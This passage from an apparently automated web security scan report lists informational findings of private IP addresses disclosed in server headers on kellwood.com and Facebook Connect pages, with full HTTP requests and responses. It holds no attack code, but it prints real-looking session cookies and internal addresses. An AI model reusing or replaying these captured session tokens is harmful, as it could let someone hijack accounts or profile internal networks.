Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/png
ETag: "72cbc1521441ca1:0"
Last-Modified: Tue, 29 Sep 2009 14:51:27 GMT
X-Powered-By: ASP.NET
Content-Length: 12202
Date: Mon, 11 Apr 2011 17:19:59 GMT
X-Varnish: 2009436533
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

.PNG
.
...IHDR....................    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...
14.74. http://kellwood.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/x-icon
ETag: "bafbdbc05635ca1:0"
Last-Modified: Mon, 14 Sep 2009 16:16:45 GMT
X-Powered-By: ASP.NET
Content-Length: 894
Date: Mon, 11 Apr 2011 17:20:06 GMT
X-Varnish: 2009440080 2009439459
Age: 1
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: HIT

..............h.......(....... ...............................------+++'''+++------------------,,,((((((,,,+++---+++777FFF888+++------------,,,,,,@@@III444***---...............------------!!!{{{......
...[SNIP]...
14.75. http://kellwood.com/homeImageRoll.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /homeImageRoll.swf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /homeImageRoll.swf HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/home.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: application/x-shockwave-flash
ETag: "983bdc5dc23fcb1:0"
Last-Modified: Thu, 19 Aug 2010 17:17:14 GMT
X-Powered-By: ASP.NET
Content-Length: 15479
Date: Mon, 11 Apr 2011 17:19:50 GMT
X-Varnish: 2009432513 2009431868
Age: 1
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: HIT

CWS    ....x..}    |S...$.In..M.R....Y..D.......RV.P.6m#mS..(.TD..EP........=....(....".>.}*(."K.sf...4......W.....9s..{33...V.....Z..F./I... #\.;my.=$^."...v.q.(..L..L....s.....e8r.d...q..D9K....
.Q..nOtt4
...[SNIP]...
14.76. http://kellwood.com/home_images/home1.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /home_images/home1.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /home_images/home1.jpg HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/homeImageRoll.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "9e26bb79cacb1:0"
Last-Modified: Fri, 11 Feb 2011 16:30:44 GMT
X-Powered-By: ASP.NET
Content-Length: 102343
Date: Mon, 11 Apr 2011 17:20:02 GMT
X-Varnish: 2009438167
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

......Exif..II*.................Ducky.......H.....ohttp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c0
...[SNIP]...
14.77. http://kellwood.com/home_images/home2.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /home_images/home2.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /home_images/home2.jpg HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/homeImageRoll.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "3e3ed89cacb1:0"
Last-Modified: Fri, 11 Feb 2011 16:30:44 GMT
X-Powered-By: ASP.NET
Content-Length: 110531
Date: Mon, 11 Apr 2011 17:20:03 GMT
X-Varnish: 2009438386
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

......Exif..II*.................Ducky.......H.....ohttp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c0
...[SNIP]...
14.78. http://kellwood.com/home_images/home5.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /home_images/home5.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /home_images/home5.jpg HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/homeImageRoll.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "f0fc31863328cb1:0"
Last-Modified: Tue, 20 Jul 2010 17:46:47 GMT
X-Powered-By: ASP.NET
Content-Length: 207303
Date: Mon, 11 Apr 2011 17:20:03 GMT
X-Varnish: 2009438535
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

......JFIF.....d.d......Ducky.......U......Adobe.d...........................................................


.....................
...
.........................................................%..
...[SNIP]...
14.79. http://kellwood.com/home_images/home6.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /home_images/home6.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /home_images/home6.jpg HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/homeImageRoll.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "72f95079cacb1:0"
Last-Modified: Fri, 11 Feb 2011 16:30:43 GMT
X-Powered-By: ASP.NET
Content-Length: 122777
Date: Mon, 11 Apr 2011 17:20:04 GMT
X-Varnish: 2009438643
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

......Exif..II*.................Ducky.......H.....ohttp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c0
...[SNIP]...
14.80. http://kellwood.com/home_images/home7.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /home_images/home7.jpg

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /home_images/home7.jpg HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/homeImageRoll.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E; __utmz=224458880.1302542386.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=224458880.1086665089.1302542386.1302542386.1302542386.1; __utmc=224458880; __utmb=224458880.1.10.1302542386

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/jpeg
ETag: "748c8c5db6d2cb1:0"
Last-Modified: Tue, 22 Feb 2011 17:31:40 GMT
X-Powered-By: ASP.NET
Content-Length: 110488
Date: Mon, 11 Apr 2011 17:20:02 GMT
X-Varnish: 2009438165
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: MISS

......Exif..II*.................Ducky.......W.....ohttp://ns.adobe.com/xap/1.0/.<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c0
...[SNIP]...
14.81. http://kellwood.com/kwd_brands.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kellwood.com
Path:   /kwd_brands.swf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /kwd_brands.swf HTTP/1.1
Host: kellwood.com
Proxy-Connection: keep-alive
Referer: http://kellwood.com/home.asp
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCCRBTRTR=LAMPEGGBCOJBHEECMABKLDLH; X-Mapping-nnojhagh=66420F5E9305FE47F5E46BCA529FC34E

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: application/x-shockwave-flash
ETag: "5011ae24c35ca1:0"
Last-Modified: Mon, 14 Sep 2009 15:06:05 GMT
X-Powered-By: ASP.NET
Content-Length: 7011
Date: Mon, 11 Apr 2011 17:19:50 GMT
X-Varnish: 2009432473 2009431870
Age: 1
Connection: keep-alive
Via: 1.1 varnish 172.16.11.7
X-Cache: HIT

CWS    mR..x..<mp\Wu.}.........ma;..$.c'N.X.,..E.]y.@...J.$...]vW.D.6.    1.F.4....4th.a...e`
..Ph...v.>......$?...LQ.9.....]..t`.&y.....{.....{.......^....c..........v..Qs.r..|..+...|99?.Sc......j9W.jqf&.
...[SNIP]...
14.82. http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1
If-None-Match: "c06ea8b2b7224493293231bb0f0cfb5c"

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "5decfe3e8e1ed6fe151a4f3d1393954c"
X-FB-Server: 10.32.109.104
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=155
Expires: Sat, 09 Apr 2011 12:33:42 GMT
Date: Sat, 09 Apr 2011 12:31:07 GMT
Connection: close
Content-Length: 211421

/*1302307723,169897320,JIT Construction: v364045,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...
14.83. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /js/api_lib/v0.4/FeatureLoader.js.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js/api_lib/v0.4/FeatureLoader.js.php HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.vermontopia.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1
If-None-Match: "f3f36f3cb4947cf46efb09c7be627988"

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "9f98ce333baf94ca6597a832d85526e9"
X-FB-Server: 10.32.216.118
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=1182
Expires: Sat, 09 Apr 2011 12:50:34 GMT
Date: Sat, 09 Apr 2011 12:30:52 GMT
Connection: close
Content-Length: 18453

/*1302306795,169924726,JIT Construction: v364045,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...
14.84. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /js/api_lib/v0.4/FeatureLoader.js.php/en_US

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js/api_lib/v0.4/FeatureLoader.js.php/en_US HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "9f98ce333baf94ca6597a832d85526e9"
X-FB-Server: 10.27.202.108
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=738
Expires: Sat, 09 Apr 2011 12:42:58 GMT
Date: Sat, 09 Apr 2011 12:30:40 GMT
Connection: close
Content-Length: 18453

/*1302308462,169593452,JIT Construction: v364045,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...
14.85. http://www.facebook.com/connect/connect.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /connect/connect.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/connect.php?id=213320140463&connections=0&stream=0 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/connect/connect.php?id=213320140463&connections=0&stream=0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.13.69
X-Cnection: close
Date: Sat, 09 Apr 2011 13:54:01 GMT
Content-Length: 0

14.86. http://www.facebook.com/connect/connect.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /connect/connect.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/connect.php?id=213320140463&connections=0&stream=0 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/connect/connect.php?id=213320140463&connections=0&stream=0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.218.29
X-Cnection: close
Date: Sat, 09 Apr 2011 12:53:20 GMT
Content-Length: 0

14.87. http://www.facebook.com/connect/connect.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /connect/connect.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/connect.php?id=213320140463&connections=0&stream=0 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/connect/connect.php?id=213320140463&connections=0&stream=0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.151.39
X-Cnection: close
Date: Sat, 09 Apr 2011 14:14:13 GMT
Content-Length: 0

14.88. http://www.facebook.com/connect/connect.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /connect/connect.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/connect.php?id=213320140463&connections=0&stream=0 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/news/27483035/detail.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/connect/connect.php?id=213320140463&connections=0&stream=0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.247.111
X-Cnection: close
Date: Sat, 09 Apr 2011 12:30:45 GMT
Content-Length: 0

14.89. http://www.facebook.com/connect/connect.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /connect/connect.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/connect.php?id=213320140463&connections=0&stream=0 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/connect/connect.php?id=213320140463&connections=0&stream=0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.52.198.83
X-Cnection: close
Date: Sat, 09 Apr 2011 15:55:17 GMT
Content-Length: 0

14.90. http://www.facebook.com/connect/connect.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /connect/connect.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/connect.php?id=213320140463&connections=0&stream=0 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/connect/connect.php?id=213320140463&connections=0&stream=0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.124.50
X-Cnection: close
Date: Sat, 09 Apr 2011 13:13:34 GMT
Content-Length: 0

14.91. http://www.facebook.com/connect/connect.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /connect/connect.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/connect.php?id=213320140463&connections=0&stream=0 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
Location: https://www.facebook.com/connect/connect.php?id=213320140463&connections=0&stream=0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.233.126
X-Cnection: close
Date: Sat, 09 Apr 2011 12:33:06 GMT
Content-Length: 0

14.92. http://www.facebook.com/connect/connect.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /connect/connect.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect/connect.php?id=213320140463&connections=0&stream=0 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.wptz.com/index.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=NM2XTYiceIt-bX1rSIT5xVeo; c_user=100001495440690; csm=1; lu=gAsbFvVopfkZiGOhi5qI3DCQ; sct=1302198565; xs=2%3A927dd74f00fb324e5281600fba722798%3A1

Response

HTTP/1.1 302 Found
